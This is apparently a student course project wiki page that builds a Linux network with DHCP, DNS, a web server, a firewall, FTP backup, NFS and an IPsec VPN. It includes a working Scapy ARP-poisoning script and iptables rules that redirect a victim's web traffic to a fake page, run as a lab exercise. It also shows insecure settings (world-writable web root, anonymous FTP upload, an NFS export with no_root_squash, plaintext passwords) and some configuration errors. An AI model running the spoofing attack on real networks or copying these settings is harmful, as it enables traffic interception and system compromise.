Data Networking/Fall 2016/FYY
1. Fulin Shen 2. Yanxiao Lu 3. Yehui Rong
Motivation edit
The development of Linux is one of the most prominent examples of free and open-source software collaboration, and this is our motivation to use Linux operating system to design a robust, effective and dynamic network solution for a start-up company, including the main and backup DNS server, DHCP server, web server, firewall, IPsec VPN, NFS and backup.
Behaviour of Protocols edit
Domain Name System edit
Domain Name System (DNS) controls the domain names of web server, translate them to Internet Protocol address. DNS is a protocol within the set of standards of how devices exchange data on the Internet. In this project, we design five records for the web server, including A, AAAA, NS, CNAME, and PTR types.
Dynamic Host Configuration Protocol edit
Dynamic Host Configuration Protocol (DHCP) is a network protocol that enables a server to automatically assign an IP address to a computer from a defined range of numbers (i.e. a scope) configured for a given network. DHCP assigns an IP address when a system is started.
webserver edit
LAMP (Linux, Apache, MySQL, and PHP) is the most popular solution to get a web server up and running. In this project, we use LAMP to set up a simple webpage so that clients can browse it with the DNS and DHCP server’s help.
Firewall edit
The main function of a firewall is to provide security through couple rules applied to the server. Here we use the firewall to allow all the needed services and deny others to make our network secure and robust.
File Transfer Protocol edit
File transfer protocol offers the backup to the server to avoid the whole network crush if the main server is malfunction. FTP is built both on the client and server, use different control and data connections between the server and client. In the project, we design the policy to back up the whole web and SQL data every day, and clean the data every 30 days to save the space.
Arp Poison edit
Arp (address resolution protocol) determines the MAC address of a device with an IP address. And the Arp poison is a network attack which exploits the transition from layer 3 to layer 2 addresses. Arp poison means that the hacker replaces the MAC address in the normal ARP message with a counterfeit one, then the hacker can take the role of man in the middle to spoof any traffic. In the project, we use a client to work as a hacker to attack another client. Every time when the normal client tries to login the webserver page, the hacker will replace the web page and display a fake website to the client.
IPsec VPN edit
IPsec (Internet Protocol Security) is a protocol used to offer secure IP communications by authenticating and encrypting the messages between the peers. Here we design a IPsec VPN tunnel between two servers using the pre shared key.
Network File System edit
Network File System (NFS) is a distributed file system protocol originally developed by Sun Microsystems, allowing the user or system administrator to mount (designate as accessible) all or a portion of a file system on a server. In this project, we create 2 clients to whom the shared file is available.
Installation Steps edit
DHCP server edit
Step1: Install DHCP
Command:
sudo apt-get update
sudo apt-get install dhcp3-server
Step2: configure the network card
Command:
sudo nano /etc/default/isc-dhcp-server
Find the line after ‘#’ and change the network card as ens33:
# on what interfaces should the DHCP server (dhcpd) serve DHCP requests?
# Separate multiple interfaces with spaces, e.g. "eth0 eth1".
INTERFACES="ens33"
Save and Exit
Step3: edit the dhcpd.conf file
Command:
sudo nano /etc/dhcp/dhcpd.conf
Set the domain name and the domain-name servers:
# option definitions common to all supported networks...
option domain-name "pawupa.com";
option domain-name-servers ns.pawupa.com;
Uncomment the following line:
authoritative
Give the ip address poll and define the subnet:
# A slightly different configuration for an internal subnet.
subnet 193.168.1.0 netmask 255.255.255.0 {
range 193.168.1.20 192.168.1.100;
option domain-name "pawupa.com";
option domain-name-servers ns1.pawupa.com;
option domain-name-servers 193.168.1.102;
option domain-name-servers ns2.pawupa.com;
option domain-name-servers 193.168.1.103;
option routers 193.168.1.1;
option broadcast-address 193.168.1.255;
default-lease-time 600;
max-lease-time 7200;
}
Give fixed address to the web server, DNS server, DNS standby server and three clients:
host web {
hardware Ethernet 00:0c:29:65:f0:5e;
fixed-address 193.168.1.1;
}
host dns {
hardware Ethernet 00:0c:29:43:e7:1a;
fixed-address 193.168.1.102;
option routers 193.168.1.1;
option broadcast-address 193.168.1.255;
default-lease-time 600;
max-lease-time 7200;
}
host dnsstandby {
hardware Ethernet 00:0c:29:c5:44:bd;
fixed-address 193.168.1.103;
option routers 193.168.1.1;
option broadcast-address 193.168.1.255;
default-lease-time 600;
max-lease-time 7200;
}
And I give three clients 193.168.1.104, 193.168.1.105, 193.168.1.106 as the method above.
Step 4: give the static address to the DHCP server
Command:
sudo nano /etc/network/interfaces
Configuration of interfaces:
# interfaces(5) file used by ifup (8) and ifdown (8)
auto lo
iface lo inet loopback
auto ens33
iface ens33 inet static
address 193.168.1.200
netmask 255.255.255.0
network 193.168.1.0
broadcast 193.168.1.255
gateway 193.168.1.1
iface ens33 inet6 static
address 1199::1
netmask 64
DHCP IPv6 configuration
Step 5: open the IPv6 configuration
Command
sudo nano /etc/sysctl.conf
Make the changes as shown below:
net.ipv6.conf.all.forwarding=1
Run sysctl –p to make it effective.
Step 6: install radvd
Command:
sudo apt-get install radvd
Step7: configure the IPv6 address pool
Command:
sudo nano /etc/radvd.conf
interface ens33
{
advSendAdvert on;
prefix 1199::/64
{
};
};
Step 8: give the DHCP server a fixed address
Just as shown in step 4
Step 9: configure the DHCP server to access website through domain name
Command:
sudo nano /etc/resolv.conf
nameserver 193.168.1.102
nameserver 193.168.1.103
step 10: restart and check the dhcp server after configuration
Command:
sudo networking restart
sudo /etc/init.d/isc-dhcp-server restart
sudo service isc-dhcp-server status
DNS edit
Master DNS
Step 1: Install bind9
Command:
sudo apt-get install bind9
After install bind9, we will get configuration files named.conf, named.conf.options, and named.conf.local in
Step 2: Demand
We want to make this host as master DNS, and can resolve
www.pawupa.com 193.168.1.1(webserver)
And add five records
Thus, we need to add
Forward Lookup Zones “pawupa.com”
Backward Lookup Zones “1.168.193.in-addr.arpa”
Another Backward Lookup Zones for IPV6 “0.0.0.0.0.0.0.0.0.0.0.0.9.9.1.1.ip6.arpa”
Step 3: Edit configuration file “named.conf.local”
Add the forward and backward lookup zones
Command:
sudo vi named.conf.local
zone "pawupa.com"{
type master;
file "/etc/bind/pawupa.com";
};
zone "1.168.193.in-addr.arpa"{
type master;
file "/etc/bind/rev.pawupa.com";
};
zone "0.0.0.0.0.0.0.0.0.0.0.0.9.9.1.1.ip6.arpa"{
type master;
file "/etc/bind/revip6.pawupa.com";
};
Step 4: Add files of zones
Copy a zone “db.local” to pawupa.com
Copy a zone “db.local” to rev.pawupa.com
Copy a zone “db.local” to revip6.pawupa.com
Command:
sudo cp /etc/bind/db.local /etc/bind/pawupa.com
sudo cp /etc/bind/db.local /etc/bind/rev.pawupa.com
sudo cp /etc/bind/db.local /etc/bind/revip6.pawupa.com
Step 5: Edit files of zones
Command:
sudo vi pawupa.com
;
; BIND data file for local loopback interface
;
$TTL 604800
@ IN SOA pawupa.com. root.pawupa.com. (
6 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ns.pawupa.com.
@ IN A 193.168.1.102
@ IN AAAA 1199::1111
ns IN A 193.168.1.102
ns IN AAAA 1199::1111
www IN A 193.168.1.1
www IN AAAA 1199::2222
oh IN CNAME www
diao IN CNAME www
wu IN CNAME www
pan IN CNAME www
sudo vi rev.pawupa.com
;
; BIND reverse data file for local loopback interface
;
$TTL 604800
@ IN SOA pawupa.com. root.pawupa.com. (
6 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
; @ IN NS ns.pawupa.com.
102 IN PTR ns.pawupa.com.
1 IN PTR www.pawupa.com.
1 IN PTR diao.pawupa.com.
1 IN PTR oh.pawupa.com.
1 IN PTR wu.pawupa.com.
1 IN PTR pan.pawupa.com.
sudo vi revip6.pawupa.com
;
; BIND reverse data file for local loopback interface
;
$TTL 604800
@ IN SOA pawupa.com. root.pawupa.com. (
6 ; Serial
604800 ; Refresh
86400 ; Retry
2419200 ; Expire
604800 ) ; Negative Cache TTL
;
@ IN NS ns.pawupa.com.
1.1.1.1.0.0.0.0.0.0.0.0.0.0.0.0 IN PTR ns.pawupa.com.
2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0 IN PTR www.pawupa.com.
2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0 IN PTR diao.pawupa.com.
2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0 IN PTR oh.pawupa.com.
2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0 IN PTR wu.pawupa.com.
2.2.2.2.0.0.0.0.0.0.0.0.0.0.0.0 IN PTR pan.pawupa.com.
Step 6: Restart DNS service
Command:
sudo /etc/init.d/bind9 restart
Slave DNS
Step 1: Edit configuration file “named.conf.local”
Add “allow-transfer { 193.168.1.103; }; “ to each zone, that synchronize the configuration of zones from master to slave. If master DNS cannot use, the slave DNS will help it to resolve.
(193.168.1.103 is the IP address of slave DNS)
Command:
sudo vi /etc/bind/named.conf.local
zone "pawupa.com"{
type master;
file "/etc/bind/pawupa.com";
allow-transfer { 193.168.1.103; };
};
zone "1.168.193.in-addr.arpa"{
type master;
file "/etc/bind/rev.pawupa.com";
allow-transfer { 193.168.1.103; };
};
zone "0.0.0.0.0.0.0.0.0.0.0.0.9.9.1.1.ip6.arpa "{
type master;
file "/etc/bind/revip6.pawupa.com";
allow-transfer { 1199::5555; };
};
Step 2: Install bind9 to another host (slave DNS)
Command:
sudo apt-get install bind9
Step 3: Edit configuration file “named.conf.local” in slave DNS host
Add the forward and backward lookup zones
Command:
sudo vi /etc/bind/named.conf.local
zone "pawupa.com"{
type slave;
file "/etc/bind/slaves/pawupa.com";
masters { 193.168.1.102; };
};
zone "1.168.193.in-addr.arpa"{
type slave;
file "/etc/bind/slaves/rev.pawupa.com";
masters { 193.168.1.102; };
};
zone "0.0.0.0.0.0.0.0.0.0.0.0.9.9.1.1.ip6.arpa"{
type slave;
file "/etc/bind/slaves/revip6.pawupa.com";
masters { 1199::1111; };
};
Step 4: Change the authority of "/etc/bind”
Command:
sudo /etc/apparmor.d/usr.sbin.named
change "/etc/bind/**r" to "/etc/bind/**rw"
Step 5: Restart apparmor
Command:
sudo /etc/init.d/apparmor restart
Step 6: Restart DNS service
The configuration of zones files will be synchronized by master DNS
Command:
sudo /etc/init.d/bind9 restart
Web Server edit
Step 1: Install Apache
Command:
sudo apt-get update
sudo apt-get install apache2
Step 2: Install PHP
Command:
sudo apt-get install php
Step 3: Install MySQL, password “linux”
Command:
sudo apt-get install mysql-server
Step 4: Check mysql is working
Command:
sudo netstat –tap | grep mysql
Step 5: Install phpmyadmin using the apache2 and myql-server with password linux
Command:
sudo apt-get install phpmyadmin
Step 6: Change the authority of /var/www
Command:
sudo chmod 777 /var/www
Step 7: Create the phpmyadmin link
Command:
sudo ln –s /usr/share/phpmyadmin /var/www/html
Step 8: Create a basic webpage “Index.htm”
Step 9: Change the default webpage catalog “/var/www” to “/home/fulin”
Command:
sudo vi /etc/apache2/apache2.conf
Step 10: Change the default webpage catalog “/var/www/html” to “/home/fulin”
Command:
Sudo vi /etc/apache2/sites-available/000-default.conf
Step 11: Restart the apache
Command:
sudo /etc/init.d/apache2 restart
Step 11: Use the browser on mac to connect the web page of the web server in VM
Firewall edit
Step 1: List the current rules that are configured for iptables
Command:
sudo iptables –L
Step 2: Accept your current SSH connection
Command:
sudo iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
Step 3: Accept SSH, HTTP, FTP, TFTP, DHCP, DNS, VPN
Command:
sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 80 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 443 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 20 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 21 -j ACCEPT
sudo iptables -A OUTPUT -p tcp --dport 20 -j ACCEPT
sudo iptables -A OUTPUT -p tcp --dport 21 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 53 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 546 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 547 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 1723 -j ACCEPT
sudo iptables -A INPUT -p udp --dport 500 -j ACCEPT
sudo iptables -A INPUT -p udp --dport 4500 -j ACCEPT
sudo iptables -A INPUT -p udp --dport 69 -j ACCEPT
sudo iptables -A OUTPUT -p udp --dport 69 -j ACCEPT
sudo iptables -A INPUT -p udp --dport 1701 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 21 -m state --state NEW,ESTABLISHED -j ACCEPT
sudo iptables -A OUTPUT -p tcp --sport 21 -m state --state ESTABLISHED -j ACCEPT
Step 4: Accept services on the computer communicate with each other by sending network packets to each other
Command:
sudo iptables -I INPUT 1 -i lo -j ACCEPT
Step 5: Accept all traffic on loopback interface
Command:
sudo iptables -A INPUT -i lo -j ACCEPT
sudo iptables -A OUTPUT -o lo -j ACCEPT
Step 6: Allow Established Outgoing Connections
Command:
sudo iptables -A OUTPUT -m conntrack --ctstate ESTABLISHED -j ACCEPT
Step 7: Internal to External
Command:
sudo iptables -A FORWARD -i ens33 -o ens33 -j ACCEPT
Step 8: Drop Invalid Packets
Command:
sudo iptables -A INPUT -m conntrack --ctstate INVALID -j DROP
Step 9: Deny ping
Command:
Sudo iptables –A INPUT –p icmp --icmp-type echo-request –j REJECT
Step 10: Limit 10 connection for every client
Command:
sudo iptables -A INPUT -p tcp –-dport 22 –m connlimit –-connlimit-above 10 –j REJECT
Step 11: Prevent HTTP flood
Command:
sudo iptables -A INPUT -p tcp --dport 80 -m limit --limit 100/minute --limit-burst 200 -j ACCEPT
Step 12: Block an IP Address
Command:
sudo iptables -I INPUT -s 193.168.1.104 -j DROP
Step 13: Cancel the block IP address
Command:
sudo iptables -D INPUT -s 193.168.1.104 -j DROP
Step 14: Permit VPN
Command:
Sudo iptables –A INPUT –p udp --dport 500 –j ACCEPT
Sudo iptables –A INPUT –p udp --dport 4500 –j ACCEPT
Sudo iptables –A INPUT –p esp –j ACCEPT
Step 15: Deny any other
Command:
sudo iptables –A INPUT –j DROP
Step 16: In order to preserve your IPTABLES rules upon reboot, install iptables-persistant
Command:
sudo apt-get install iptables-persistent
Step 17: If you make any changes to the rules, run the following commands so you don’t lose them during a system reboot
Command:
sudo netfilter-persistent save
sudo netfilter-persistent reload
Back UP edit
Step 1: Install ftp
Command:
Sudo apt-get install vsftpd
Step 2: Start ftp server
Command:
Service vsftpd start
Step 3: Create ftp script “testftp.sh”
#!/bin/sh
FTP_IP=193.168.1.104
FTP_USER=fulinshen
FTP_PASS=sflin911911
FTP_backup=/home/fulinshen/test
BK_DR=/home/fulin/varcopy
DB_DR=/var
DAYS=30
LINUX_USER=fulinshen
date=` date +%Y%m%d `
tar zcvf $BK_DR/test$date.tar.gz $DB_DR
chown -R $LINUX_USER:$LINUX_USER $BK_DR
find $BK_DR -name "test*" -type f -mtime +$DAYS -exec rm {} \;
deldate=` date -d -30day +%Y%m%d `
ftp -i -v -n $FTP_IP << END
user $FTP_USER $FTP_PASS
binary
cd $FTP_backup
lcd $BK_DR
mput test$date.tar.gz
mdelete test$deldate.tar.gz
bye
Step 4: Add authority to script
Command:
Chmod +x /home/fulin/varcopy/testftp.sh
Step 5: Change configuration of ftp
sudo vi /etc/vsftpd.conf
anonymous_enable=YES
local_enable=YES
anon_upload_enable=YES
anon_mkdir_write_enable=YES
Step 6: Add kernel module to allow passive ftp
modprobe ip_conntrack_ftp
Step 7: Restart ftp service and check the status
Command:
service vsftpd restart
service vsftpd status
Step 8: Add rule to commit the script every day at 14:40 PM
Command:
Sudo vi /etc/crontab
40 14 * * * root sh /home/fulin/varcopy/testftp.sh >/dev/null 2>&1
Step 9: Restart cron service and check the status
Command:
service cron restart
service cron status
Arp poison edit
Step 1: Install scapy
Command:
sudo apt-get install tcpdump python3-crypto ipython3
sudo apt install python-scapy
sudo apt install sysv-rc-conf
Step 2: Use root
Command:
Sudo passwd root
Step 3: Start iptables after reboot
Command:
sysv-rc-conf --level 2345 iptables on
Step 4: Turn on IP forwarding
Command:
echo 1 > /proc/sys/net/ipv4/ip_forward
Step 5: Configure Scapy arp poison
Command:
scapy
op=2
victim= '193.168.1.105'
spoof= '193.168.1.1' //gateway IP
mac='00:0c:29:73:56:67' // victim mac address
arp=ARP(op=op,psrc=spoof,pdst=victim,hwdst=mac)
send(arp)
op =1
arp=ARP(op=op,psrc=spoof,pdst=victim,hwdst=mac)
send(arp)
send(arp,inter=2,count=1000) // send arp every 2 seconds, 1000 counts
Step 6: Create fake web page
Command:
/etc/init.d/apache2 start
echo “WOW,YOU WON THE POWER BALL JACKPOT.” > /home/fulinshen/index.htm
Step 7: Then configure your IP Tables to forward all traffic except HTTP traffic. For HTTP traffic, we will return our own site instead (193.168.1.104 is the IP address of hacker)
Command:
iptables -t nat --flush
iptables --zero
iptables -A FORWARD --in-interface ens33 -j ACCEPT
iptables -t nat --append POSTROUTING --out-interface ens33 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --dport 80 --jump DNAT --to-destination 193.168.1.104
IPsec VPN edit
Step 1: Inatall strongswan
Command:
sudo apt-get install strongswan
Step 2: Install Opensc
Command:
Sudo apt-get install opensc
Step 3: Install GMP library
Command:
Sudo apt-get install libgmp10
Step 4: Install development library of GMP
Command:
Sudo apt-get install libgmp-dev
Step 5: Install Openssl libcrypto
Command:
Sudo apt-get install libssl-dev
Step 6: Under /usr/src/ folder, download the Strongswan
Command:
cd /usr/src
wget https://download.strongswan.org/strongswan-5.5.0.tar.gz
Step 7: Extract the compressed file
Command:
tar –xzf strongswan-5.5.0.tar.gz
Step 8: Run the configure script to check the dependencies of strongswan
Command:
cd strongswan-5.5.0
./configure –help | grep pkcs
Step 9: Run the configure script, use prefix /usr/local and enable openssl support
Command:
./configure --prefix=/usr/local --enable-openssl
Step 10: Run the following two commands to compile and install strongswan under /usr/local directory
Command:
make
make install
Step 11: Under /usr/local/etc path, Pre-share key based tunnel
One side ipsec.conf configuration:
config setup
charondebug="all"
uniqueids=yes
strictcrlpolicy=no
conn %default
conn tunnel #
left=193.168.1.1
leftsubnet=192.168.223.0/24
right=193.168.1.104
rightsubnet=192.168.222.0/24
ike=aes256-sha2_256-modp1024!
esp=aes256-sha2_256!
keyingtries=0
ikelifetime=1h
lifetime=8h
dpddelay=30
dpdtimeout=120
dpdaction=restart
authby=secret
auto=start
keyexchange=ikev2
type=tunnel
ipsec.secrets file configuration:
193.168.1.1 193.168.1.104 : PSK ‘linux’
Another side ipsec.conf configuration:
config setup
charondebug="all"
uniqueids=yes
strictcrlpolicy=no
conn %default
conn tunnel #
left=193.168.1.104
leftsubnet=192.168.1.0/24
right=193.168.1.1
rightsubnet=192.168.2.0/24
ike=aes256-sha2_256-modp1024!
esp=aes256-sha2_256!
keyingtries=0
ikelifetime=1h
lifetime=8h
dpddelay=30
dpdtimeout=120
dpdaction=restart
authby=secret
auto=start
keyexchange=ikev2
type=tunnel
ipsec.secrets file configuration:
193.168.1.104 193.168.1.1 : PSK ‘linux’
Step12: After changes at both sides, create tunnel
Command:
Sudo ipesc restart
Step 13: Check the status of tunnel on both machines
Command:
Sudo ipsec statusall
Step 14: Test
One server ping another:
Ping –s 4048 193.168.1.104
At the another side, watch the status (If you notice the number of packets and the number of bytes should be increasing with the ping being run, this shows things are running the way they should be.):
Sudo watch ipsec statusall
NFS edit
NFS-Server
Step 1: Inatall nfs-kernel-server
Command:
sudo apt-get install nfs-kernel-server
sudo apt-get install rpcbind
Step 2: Make share folder
Command:
mkdir /home/reve001/Desktop/nfs
Step 3: Edit configuration
Command:
sudo vi /etc/exports
/home/reve001/Desktop/nfs *(rw,sync,no_root_squash,no_subtree_check)
Step 4: Restart service
Command:
sudo service rpcbind restart restart
sudo service restartnfs-kernel-server restart
Step 5: Test
Command:
showmount -e
Export list for ubuntu:
/home/reve001/Desktop/nfs *
NFS-Clients
Step 1: Inatall nfs-common for clients
Command:
sudo apt-get install nfs-common
sudo apt-get install rpcbind
Step 2: Make share folder
Command:
mkdir /home/fulinshen/Desktop/nfs
Step 3: Mount the share file
Command:
sudo mount -t nfs 193.168.1.102:/home/reve001/Desktop/nfs /home/fulinshen/Desktop/nfs
Step 4: Mount this share file when turn on the client
Command:
sudo vi /etc/rc.local
sudo mount -t nfs 193.168.1.102:/home/reve001/Desktop/nfs /home/fulinshen/Desktop/nfs
Test Plan edit
DHCP Test edit
Step 1: Start the DHCP server.
Step 2: Start all the other clients, use “ifconfig” command to check whether or not the IP address is correctly received from the DHCP server.
Webserver Test edit
Step 1: Start the web server.
Step 2: At the client side, open the browser and enter the IP address of the webserver to check whether or not the right web page can be displayed.
DNS Test edit
Step 1: Start the DNS server.
Step 2: At the client side, open the browser again and this time enter the domain name of the webserver instead of the IP address, check whether or not the right web page can be displayed.
Firewall Test edit
Step 1: At a client side, open the browser to surf the web page.
Step 2: Add an IPtable to deny the client browsing the web server.
Step 3: At a client side, open the browser again, force refresh the web page, check whether or not the right web page can be displayed.
Step 4: Delete the IPtable to allow the client browsing the web server again.
Step 5: Again at the client side, open the browser again, force refresh the web page, check whether or not the right web page can be displayed.
Step 6: When all the other IPtable rules existing, test the whole functions of the project to check whether or not these functions are working well or not.
Backup Test edit
Step 1: Start the FTP server.
Step 2: Change the ftp configuration to enable the backup process in the next couple minutes, restart the ftp server.
Step3: When the designed time arrives, check whether or not the files are backed up to the local file folder and the remote device’s file folder too.
Arp Poison Test edit
Step 1: Start the normal web server and the hacker’s web server.
Step 2: The hacker to send fake ARP message to the client.
Step 3: The client opens the browser to enter the normal web page, check whether or not the client will the fake web page instead of the normal page.
IPsec VPN Test edit
Step 1: One server ping another (Ping –s 4048 193.168.1.104).
Step 2: At the another side, watch the status (If you notice the number of packets and the number of bytes should be increasing with the ping being run, this shows things are running the way they should be), using command “Sudo watch ipsec statusall”.
NFS Test edit
Step 1: Start NFS server and client.
Step 2: Put a file to the shared folder on the client server.
Step 3: At the server side, check whether or not the file exists.
References edit
Websites Referred:
1. https://oitibs.com/easy-ubuntu-16-server-firewall/
2. https://www.digitalocean.com/community/tutorials/how-to-set-up-a-firewall-using-iptables-on-ubuntu-14-04
3 .https://www.howtoforge.com/tutorial/strongswan-based-ipsec-vpn-using-certificates-and-pre-shared-key-on-ubuntu-16-04/
4. http://www.tuicool.com/articles/AzEbii
5. http://wiki.ubuntu.com.cn/%E5%AE%89%E8%A3%85DHCP
6. https://en.wikipedia.org/wiki/Domain_Name_System
7. https://en.wikipedia.org/wiki/Network_File_System
Books Referred:
1. Computer Networking: A Top-Down Approach, 6/e James F. Kurose, Keith W. Ross